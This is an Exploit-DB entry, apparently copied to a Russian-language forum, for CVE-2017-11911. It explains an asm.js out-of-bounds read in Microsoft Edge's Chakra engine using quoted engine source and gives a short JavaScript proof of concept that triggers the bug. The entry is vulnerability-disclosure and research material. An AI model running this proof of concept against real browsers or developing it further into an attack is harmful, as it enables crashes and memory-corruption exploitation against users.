- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 43468
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2017-11911
- Дата публикации
- 2018-01-09
Microsoft Edge Chakra - 'asm.js' Out-of-Bounds Read
Код:
/*
Here's a snippet of AsmJSByteCodeGenerator::EmitAsmJsFunctionBody.
AsmJsVar * initSource = nullptr;
if (decl->sxVar.pnodeInit->nop == knopName)
{
AsmJsSymbol * initSym = mCompiler->LookupIdentifier(decl->sxVar.pnodeInit->name(), mFunction);
if (initSym->GetSymbolType() == AsmJsSymbol::Variable)
{
// in this case we are initializing with value of a constant var
initSource = initSym->Cast<AsmJsVar>();
}
...
}
...
if (initSource)
{
if (var->GetType().isDouble())
{
mWriter.AsmReg2(Js::OpCodeAsmJs::Ld_Db, var->GetLocation(), mFunction->GetConstRegister<double>(initSource->GetDoubleInitialiser()));
}
Chakra thinks the PoC is valid asm.js code. What happens when the variable "b" gets initialized is:
1. mCompiler->LookupIdentifier is called with "a" as the first argument. And it returns the local variable "a", which is of type int, but not the double constant "a".
2. mFunction->GetConstRegister fails to find the int value in the double constant table. So it returns -1 which leads OOB read.
PoC:
*/
function createModule() {
'use asm';
const a = 1.0;
function f() {
var b = a;
var a = 0;
}
return f;
}
var f = createModule();
f();
- Источник
- www.exploit-db.com